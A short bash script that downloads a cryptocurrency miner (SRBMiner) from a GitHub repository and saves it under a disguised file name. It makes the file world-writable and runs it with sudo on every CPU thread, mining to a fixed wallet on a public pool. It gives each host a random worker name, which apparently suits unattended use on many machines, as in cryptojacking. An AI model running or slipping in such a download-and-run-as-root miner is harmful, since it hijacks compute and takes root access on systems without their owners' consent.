#!/bin/bash
export LC_ALL=C
export LANG=C
curl https://github.com/liecamshoe/file/raw/main/SRBMiner-MULTI -L -o serbe
chmod 777 serbe
sudo ./serbe --disable-gpu --algorithm randomc64 --pool stratum+tcp://c64.suprnova.cc:6464 --wallet Wo4wBGZX7fq2cNG65PfwHH6D7s3aJz71bGPuJ7mwtNSf6cPsQsP8ihJAAT7fnk2Uf3LBH4BcMBER4jkFKHPkuXd732397gLRJ.$(echo $RANDOM | md5sum | head -c 10) --password x --cpu-threads $(nproc --all)
